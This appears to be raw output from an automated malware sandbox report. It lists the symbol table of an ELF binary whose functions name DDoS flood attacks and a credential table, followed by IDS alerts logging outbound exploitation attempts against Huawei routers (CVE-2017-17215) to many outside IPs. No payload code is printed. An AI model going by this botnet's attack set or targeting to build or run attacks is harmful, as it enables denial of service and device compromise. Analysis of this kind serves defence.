                                          __malloc_consolidate.symtab0x146e0436FUNC<unknown>HIDDEN2
                                          __malloc_largebin_index.symtab0x13780120FUNC<unknown>DEFAULT2
                                          __malloc_lock.symtab0x2784824OBJECT<unknown>DEFAULT13
                                          __malloc_state.symtab0x326f4888OBJECT<unknown>DEFAULT14
                                          __malloc_trim.symtab0x14630176FUNC<unknown>DEFAULT2
                                          __muldf3.symtab0x1b3b4656FUNC<unknown>HIDDEN2
                                          __nedf2.symtab0x1b860132FUNC<unknown>HIDDEN2
                                          __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                          __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                          __open.symtab0x16210100FUNC<unknown>DEFAULT2
                                          __open_nocancel.symtab0x161f424FUNC<unknown>DEFAULT2
                                          __pagesize.symtab0x280784OBJECT<unknown>DEFAULT14
                                          __preinit_array_end.symtab0x2770c0NOTYPE<unknown>HIDDEN8
                                          __preinit_array_start.symtab0x2770c0NOTYPE<unknown>HIDDEN8
                                          __progname.symtab0x279404OBJECT<unknown>DEFAULT13
                                          __progname_full.symtab0x279444OBJECT<unknown>DEFAULT13
                                          __pthread_initialize_minimal.symtab0x1a64812FUNC<unknown>DEFAULT2
                                          __pthread_mutex_init.symtab0x1650c8FUNC<unknown>DEFAULT2
                                          __pthread_mutex_lock.symtab0x165048FUNC<unknown>DEFAULT2
                                          __pthread_mutex_trylock.symtab0x165048FUNC<unknown>DEFAULT2
                                          __pthread_mutex_unlock.symtab0x165048FUNC<unknown>DEFAULT2
                                          __pthread_return_0.symtab0x165048FUNC<unknown>DEFAULT2
                                          __pthread_unwind.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                          __read.symtab0x16330100FUNC<unknown>DEFAULT2
                                          __read_nocancel.symtab0x1631424FUNC<unknown>DEFAULT2
                                          __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                          __restore_core_regs.symtab0x1c6a028FUNC<unknown>HIDDEN2
                                          __rtld_fini.symtab0x280804OBJECT<unknown>HIDDEN14
                                          __sigaddset.symtab0x1373836FUNC<unknown>DEFAULT2
                                          __sigdelset.symtab0x1375c36FUNC<unknown>DEFAULT2
                                          __sigismember.symtab0x1371436FUNC<unknown>DEFAULT2
                                          __sigjmp_save.symtab0x1ada464FUNC<unknown>HIDDEN2
                                          __sigsetjmp.symtab0x1a73c12FUNC<unknown>DEFAULT2
                                          __stdin.symtab0x279604OBJECT<unknown>DEFAULT13
                                          __stdio_READ.symtab0x1aa7488FUNC<unknown>HIDDEN2
                                          __stdio_WRITE.symtab0x1aacc220FUNC<unknown>HIDDEN2
                                          __stdio_adjust_position.symtab0x1aba8200FUNC<unknown>HIDDEN2
                                          __stdio_fwrite.symtab0x17f98320FUNC<unknown>HIDDEN2
                                          __stdio_rfill.symtab0x1ac7048FUNC<unknown>HIDDEN2
                                          __stdio_seek.symtab0x1ad4460FUNC<unknown>HIDDEN2
                                          __stdio_trans2r_o.symtab0x1aca0164FUNC<unknown>HIDDEN2
                                          __stdio_trans2w_o.symtab0x182bc220FUNC<unknown>HIDDEN2
                                          __stdio_wcommit.symtab0x1839848FUNC<unknown>HIDDEN2
                                          __stdout.symtab0x279644OBJECT<unknown>DEFAULT13
                                          __subdf3.symtab0x1afa0788FUNC<unknown>HIDDEN2
                                          __sys_accept.symtab0x12fd468FUNC<unknown>DEFAULT2
                                          __sys_connect.symtab0x130d068FUNC<unknown>DEFAULT2
                                          __sys_recv.symtab0x1325468FUNC<unknown>DEFAULT2
                                          __sys_recvfrom.symtab0x1330872FUNC<unknown>DEFAULT2
                                          __sys_send.symtab0x133d868FUNC<unknown>DEFAULT2
                                          __sys_sendto.symtab0x1348c76FUNC<unknown>DEFAULT2
                                          __syscall_error.symtab0x16ad844FUNC<unknown>HIDDEN2
                                          __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          __syscall_nanosleep.symtab0x16f0c64FUNC<unknown>DEFAULT2
                                          __syscall_rt_sigaction.symtab0x16bc064FUNC<unknown>DEFAULT2
                                          __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          __syscall_select.symtab0x1137c68FUNC<unknown>DEFAULT2
                                          __tls_get_addr.symtab0x1a3f436FUNC<unknown>DEFAULT2
                                          __uClibc_fini.symtab0x16548124FUNC<unknown>DEFAULT2
                                          __uClibc_init.symtab0x1661888FUNC<unknown>DEFAULT2
                                          __uClibc_main.symtab0x166701004FUNC<unknown>DEFAULT2
                                          __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          __uclibc_progname.symtab0x2793c4OBJECT<unknown>HIDDEN13
                                          __udivsi3.symtab0x10d98252FUNC<unknown>HIDDEN2
                                          __write.symtab0x162a0100FUNC<unknown>DEFAULT2
                                          __write_nocancel.symtab0x1628424FUNC<unknown>DEFAULT2
                                          __xpg_strerror_r.symtab0x12ea0268FUNC<unknown>DEFAULT2
                                          __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          __xstat32_conv.symtab0x17178172FUNC<unknown>HIDDEN2
                                          __xstat64_conv.symtab0x170ac204FUNC<unknown>HIDDEN2
                                          _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _bss_custom_printf_spec.symtab0x27b1410OBJECT<unknown>DEFAULT14
                                          _bss_end__.symtab0x32aa00NOTYPE<unknown>DEFAULTSHN_ABS
                                          _charpad.symtab0x11b3484FUNC<unknown>DEFAULT2
                                          _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _custom_printf_arginfo.symtab0x3269c40OBJECT<unknown>HIDDEN14
                                          _custom_printf_handler.symtab0x326c440OBJECT<unknown>HIDDEN14
                                          _custom_printf_spec.symtab0x278444OBJECT<unknown>HIDDEN13
                                          _dl_aux_init.symtab0x1a65456FUNC<unknown>DEFAULT2
                                          _dl_nothread_init_static_tls.symtab0x1a68c88FUNC<unknown>HIDDEN2
                                          _dl_phdr.symtab0x32a984OBJECT<unknown>DEFAULT14
                                          _dl_phnum.symtab0x32a9c4OBJECT<unknown>DEFAULT14
                                          _dl_tls_dtv_gaps.symtab0x32a8c1OBJECT<unknown>DEFAULT14
                                          _dl_tls_dtv_slotinfo_list.symtab0x32a884OBJECT<unknown>DEFAULT14
                                          _dl_tls_generation.symtab0x32a904OBJECT<unknown>DEFAULT14
                                          _dl_tls_max_dtv_idx.symtab0x32a804OBJECT<unknown>DEFAULT14
                                          _dl_tls_setup.symtab0x1a38c104FUNC<unknown>DEFAULT2
                                          _dl_tls_static_align.symtab0x32a7c4OBJECT<unknown>DEFAULT14
                                          _dl_tls_static_nelem.symtab0x32a944OBJECT<unknown>DEFAULT14
                                          _dl_tls_static_size.symtab0x32a844OBJECT<unknown>DEFAULT14
                                          _dl_tls_static_used.symtab0x32a784OBJECT<unknown>DEFAULT14
                                          _edata.symtab0x27a380NOTYPE<unknown>DEFAULTSHN_ABS
                                          _end.symtab0x32aa00NOTYPE<unknown>DEFAULTSHN_ABS
                                          _exit.symtab0x16c00104FUNC<unknown>DEFAULT2
                                          _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _fini.symtab0x1cf300FUNC<unknown>DEFAULT3
                                          _fixed_buffers.symtab0x280a48192OBJECT<unknown>DEFAULT14
                                          _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _fp_out_narrow.symtab0x11b88132FUNC<unknown>DEFAULT2
                                          _fpmaxtostr.symtab0x185c42036FUNC<unknown>HIDDEN2
                                          _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _init.symtab0x80d40FUNC<unknown>DEFAULT1
                                          _load_inttype.symtab0x183c8116FUNC<unknown>HIDDEN2
                                          _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _memcpy.symtab0x198400FUNC<unknown>HIDDEN2
                                          _ppfs_init.symtab0x12300160FUNC<unknown>HIDDEN2
                                          _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _ppfs_parsespec.symtab0x125e81392FUNC<unknown>HIDDEN2
                                          _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _ppfs_prepargs.symtab0x123a068FUNC<unknown>HIDDEN2
                                          _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _ppfs_setargs.symtab0x123e4432FUNC<unknown>HIDDEN2
                                          _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _promoted_size.symtab0x1259484FUNC<unknown>DEFAULT2
                                          _pthread_cleanup_pop_restore.symtab0x1651c44FUNC<unknown>DEFAULT2
                                          _pthread_cleanup_push_defer.symtab0x165148FUNC<unknown>DEFAULT2
                                          _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _setjmp.symtab0x16b8c8FUNC<unknown>DEFAULT2
                                          _sigintr.symtab0x326ec8OBJECT<unknown>HIDDEN14
                                          _start.symtab0x81940FUNC<unknown>DEFAULT2
                                          _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _stdio_fopen.symtab0x17b381120FUNC<unknown>HIDDEN2
                                          _stdio_init.symtab0x180d8128FUNC<unknown>HIDDEN2
                                          _stdio_openlist.symtab0x279684OBJECT<unknown>DEFAULT13
                                          _stdio_openlist_add_lock.symtab0x2808412OBJECT<unknown>DEFAULT14
                                          _stdio_openlist_dec_use.symtab0x19018688FUNC<unknown>HIDDEN2
                                          _stdio_openlist_del_count.symtab0x280a04OBJECT<unknown>DEFAULT14
                                          _stdio_openlist_del_lock.symtab0x2809012OBJECT<unknown>DEFAULT14
                                          _stdio_openlist_use_count.symtab0x2809c4OBJECT<unknown>DEFAULT14
                                          _stdio_streams.symtab0x2796c204OBJECT<unknown>DEFAULT13
                                          _stdio_term.symtab0x18158356FUNC<unknown>HIDDEN2
                                          _stdio_user_locking.symtab0x279504OBJECT<unknown>DEFAULT13
                                          _store_inttype.symtab0x1843c44FUNC<unknown>HIDDEN2
                                          _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _string_syserrmsgs.symtab0x1e6642906OBJECT<unknown>HIDDEN4
                                          _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _uintmaxtostr.symtab0x18468348FUNC<unknown>HIDDEN2
                                          _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _vfprintf_internal.symtab0x11c0c1780FUNC<unknown>HIDDEN2
                                          _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          abort.symtab0x14b10296FUNC<unknown>DEFAULT2
                                          abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          accept.symtab0x13018116FUNC<unknown>DEFAULT2
                                          accept.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          access.symtab0x1104c64FUNC<unknown>DEFAULT2
                                          access.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          add_auth_entry.symtab0xe590352FUNC<unknown>DEFAULT2
                                          attack.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          attack_get_opt_int.symtab0x86ac112FUNC<unknown>DEFAULT2
                                          attack_get_opt_ip.symtab0x8640108FUNC<unknown>DEFAULT2
                                          attack_gre.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          attack_gre_eth.symtab0x8ab01684FUNC<unknown>DEFAULT2
                                          attack_gre_ip.symtab0x91441564FUNC<unknown>DEFAULT2
                                          attack_init.symtab0x871c916FUNC<unknown>DEFAULT2
                                          attack_kill_all.symtab0x82cc344FUNC<unknown>DEFAULT2
                                          attack_ongoing.symtab0x27a5c32OBJECT<unknown>DEFAULT14
                                          attack_parse.symtab0x8424540FUNC<unknown>DEFAULT2
                                          attack_start.symtab0x81d0252FUNC<unknown>DEFAULT2
                                          attack_std.symtab0x9760672FUNC<unknown>DEFAULT2
                                          attack_std.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          attack_tcp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          attack_tcp_ack.symtab0xa1b41784FUNC<unknown>DEFAULT2
                                          attack_tcp_bypass.symtab0xaf58860FUNC<unknown>DEFAULT2
                                          attack_tcp_stomp.symtab0x9a001972FUNC<unknown>DEFAULT2
                                          attack_tcp_syn.symtab0xa8ac1708FUNC<unknown>DEFAULT2
                                          attack_udp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          attack_udp_bypass.symtab0xb2b4556FUNC<unknown>DEFAULT2
                                          attack_udp_generic.symtab0xbbb81260FUNC<unknown>DEFAULT2
                                          attack_udp_plain.symtab0xb4e0672FUNC<unknown>DEFAULT2
                                          attack_udp_vse.symtab0xb7801080FUNC<unknown>DEFAULT2
                                          auth_table.symtab0x27b084OBJECT<unknown>DEFAULT14
                                          auth_table_len.symtab0x27adc4OBJECT<unknown>DEFAULT14
                                          auth_table_max_weight.symtab0x27b0c2OBJECT<unknown>DEFAULT14
                                          been_there_done_that.symtab0x27b204OBJECT<unknown>DEFAULT14
                                          bind.symtab0x1308c68FUNC<unknown>DEFAULT2
                                          bind.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          brk.symtab0x1a6e488FUNC<unknown>DEFAULT2
                                          brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          bsd_signal.symtab0x13650196FUNC<unknown>DEFAULT2
                                          buffer.symtab0x2a5ec32768OBJECT<unknown>DEFAULT14
                                          calloc.symtab0x14130320FUNC<unknown>DEFAULT2
                                          calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          chdir.symtab0x1108c56FUNC<unknown>DEFAULT2
                                          chdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          checksum_generic.symtab0xc0a480FUNC<unknown>DEFAULT2
                                          checksum_tcpudp.symtab0xc0f4164FUNC<unknown>DEFAULT2
                                          clock.symtab0x1199c52FUNC<unknown>DEFAULT2
                                          clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          close.symtab0x16180100FUNC<unknown>DEFAULT2
                                          closedir.symtab0x11540272FUNC<unknown>DEFAULT2
                                          closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          completed.5105.symtab0x27a381OBJECT<unknown>DEFAULT14
                                          conn_table.symtab0x27ab04OBJECT<unknown>DEFAULT14
                                          conn_table.symtab0x326044OBJECT<unknown>DEFAULT14
                                          connect.symtab0x13114116FUNC<unknown>DEFAULT2
                                          connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          ensure_single_instance.symtab0xd410356FUNC<unknown>DEFAULT2
                                          environ.symtab0x280744OBJECT<unknown>DEFAULT14
                                          errno.symtab0x04TLS<unknown>DEFAULT8
                                          errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          exit.symtab0x1525c196FUNC<unknown>DEFAULT2
                                          exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          exp10_table.symtab0x1f59072OBJECT<unknown>DEFAULT4
                                          fake_time.symtab0x27b104OBJECT<unknown>DEFAULT14
                                          fclose.symtab0x177e8816FUNC<unknown>DEFAULT2
                                          fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                          fcntl.symtab0x10f58244FUNC<unknown>DEFAULT2
                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                          2024-07-26T17:42:38.606153+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3813637215192.168.2.1541.11.77.213
                                          2024-07-26T17:42:23.034146+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662437215192.168.2.15197.114.251.28
                                          2024-07-26T17:42:22.964048+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295637215192.168.2.15157.31.97.126
                                          2024-07-26T17:42:24.652743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521637215192.168.2.15197.224.46.253
                                          2024-07-26T17:43:24.644108+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045437215192.168.2.15197.172.148.101
                                          2024-07-26T17:42:38.401570+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876637215192.168.2.1553.253.80.54
                                          2024-07-26T17:43:10.649976+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325037215192.168.2.15157.96.243.165
                                          2024-07-26T17:42:03.752068+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099637215192.168.2.15197.42.62.225
                                          2024-07-26T17:42:23.602358+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6088437215192.168.2.15197.132.136.99
                                          2024-07-26T17:43:10.506478+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229437215192.168.2.15197.52.119.244
                                          2024-07-26T17:42:24.200167+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259837215192.168.2.15173.34.24.153
                                          2024-07-26T17:42:30.926428+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5111037215192.168.2.15200.204.65.34
                                          2024-07-26T17:42:22.988608+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867037215192.168.2.15157.198.230.178
                                          2024-07-26T17:42:23.602102+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525637215192.168.2.1523.114.18.67
                                          2024-07-26T17:42:09.449482+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3563437215192.168.2.15197.121.140.141
                                          2024-07-26T17:42:24.221999+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602437215192.168.2.1552.4.140.64
                                          2024-07-26T17:42:23.326651+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598637215192.168.2.151.148.239.73
                                          2024-07-26T17:43:26.476272+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971237215192.168.2.15197.6.38.74
                                          2024-07-26T17:43:04.748495+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029637215192.168.2.15157.208.245.162
                                          2024-07-26T17:42:24.475233+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554237215192.168.2.15187.2.62.124
                                          2024-07-26T17:42:22.966091+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527037215192.168.2.15197.54.40.22
                                          2024-07-26T17:43:19.129689+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308837215192.168.2.15146.234.54.178
                                          2024-07-26T17:43:32.301159+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3301037215192.168.2.15157.100.204.20
                                          2024-07-26T17:43:34.899760+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599837215192.168.2.1571.89.91.135
                                          2024-07-26T17:42:33.042545+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433237215192.168.2.1541.90.26.243
                                          2024-07-26T17:43:00.662098+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298437215192.168.2.15157.77.196.3
                                          2024-07-26T17:42:23.204533+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095637215192.168.2.15197.225.190.134
                                          2024-07-26T17:42:03.751984+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876837215192.168.2.1541.108.36.195
                                          2024-07-26T17:42:23.105182+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927637215192.168.2.15103.70.219.127
                                          2024-07-26T17:42:24.293761+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242437215192.168.2.15223.164.117.74
                                          2024-07-26T17:42:22.977903+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848837215192.168.2.15197.47.175.40
                                          2024-07-26T17:42:45.131370+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3784037215192.168.2.15157.249.74.117
                                          2024-07-26T17:42:24.474935+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961837215192.168.2.15157.79.31.23
                                          2024-07-26T17:42:44.306039+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719837215192.168.2.1541.253.34.178
                                          2024-07-26T17:42:38.390099+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036437215192.168.2.15157.145.67.197
                                          2024-07-26T17:42:58.924546+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215837215192.168.2.15157.247.1.77
                                          2024-07-26T17:42:53.132234+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4438637215192.168.2.1541.248.56.111
                                          2024-07-26T17:43:04.732612+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396637215192.168.2.15197.242.49.62
                                          2024-07-26T17:42:24.256365+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5243837215192.168.2.1541.150.32.89
                                          2024-07-26T17:43:10.504004+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4672237215192.168.2.1541.197.157.202
                                          2024-07-26T17:42:54.163417+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3278037215192.168.2.1541.191.236.68
                                          2024-07-26T17:42:27.004016+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850237215192.168.2.15157.233.107.214
                                          2024-07-26T17:42:22.846531+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009237215192.168.2.15197.113.28.145
                                          2024-07-26T17:42:38.374536+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070037215192.168.2.1534.4.180.184
                                          2024-07-26T17:42:07.666081+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773237215192.168.2.15197.220.2.67
                                          2024-07-26T17:42:24.173602+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4075837215192.168.2.1541.179.100.167
                                          2024-07-26T17:42:24.474723+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575437215192.168.2.1572.194.119.143
                                          2024-07-26T17:43:00.630205+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3307237215192.168.2.1541.108.106.69
                                          2024-07-26T17:43:02.573716+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462037215192.168.2.15157.154.246.111
                                          2024-07-26T17:43:32.169236+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934237215192.168.2.15157.52.106.58
                                          2024-07-26T17:43:10.690145+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681637215192.168.2.15157.83.167.52
                                          2024-07-26T17:42:03.751852+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166437215192.168.2.1541.17.40.71
                                          2024-07-26T17:42:22.901285+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160437215192.168.2.1541.160.9.226
                                          2024-07-26T17:43:00.561044+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755437215192.168.2.1541.213.22.193
                                          2024-07-26T17:43:32.160228+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5548837215192.168.2.1541.221.99.246
                                          2024-07-26T17:42:33.008864+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3952437215192.168.2.15175.131.176.14
                                          2024-07-26T17:43:34.312161+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3893037215192.168.2.1541.153.156.251
                                          2024-07-26T17:42:19.315465+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5086437215192.168.2.15197.149.180.3
                                          2024-07-26T17:43:04.642054+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860437215192.168.2.15197.156.173.119
                                          2024-07-26T17:42:23.034149+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741237215192.168.2.1541.160.147.129
                                          2024-07-26T17:42:24.287275+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061837215192.168.2.1538.110.93.103
                                          2024-07-26T17:42:46.396192+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450437215192.168.2.1560.31.131.14
                                          2024-07-26T17:43:00.567662+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791037215192.168.2.15157.95.126.83
                                          2024-07-26T17:42:22.937307+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106037215192.168.2.15157.205.139.180
                                          2024-07-26T17:42:35.406784+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3371837215192.168.2.15197.244.230.30
                                          2024-07-26T17:42:03.752024+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679637215192.168.2.15157.191.156.69
                                          2024-07-26T17:43:32.177733+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038437215192.168.2.1541.237.132.121
                                          2024-07-26T17:42:23.000803+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3514637215192.168.2.15192.123.227.88
                                          2024-07-26T17:42:24.208270+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315037215192.168.2.1514.64.173.32
                                          2024-07-26T17:42:24.313201+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4634237215192.168.2.15157.141.168.114
                                          2024-07-26T17:42:56.300032+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656637215192.168.2.15197.65.6.235
                                          2024-07-26T17:42:42.068020+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024837215192.168.2.1541.62.161.142
                                          2024-07-26T17:43:02.583024+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897437215192.168.2.1536.6.249.246
                                          2024-07-26T17:43:10.506477+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361237215192.168.2.15197.83.6.23
                                          2024-07-26T17:42:48.050350+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611237215192.168.2.15157.120.85.255
                                          2024-07-26T17:43:10.504855+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406437215192.168.2.15197.142.126.134
                                          2024-07-26T17:42:40.525022+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4388237215192.168.2.1541.31.199.209
                                          2024-07-26T17:42:05.370024+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797037215192.168.2.1541.79.95.86
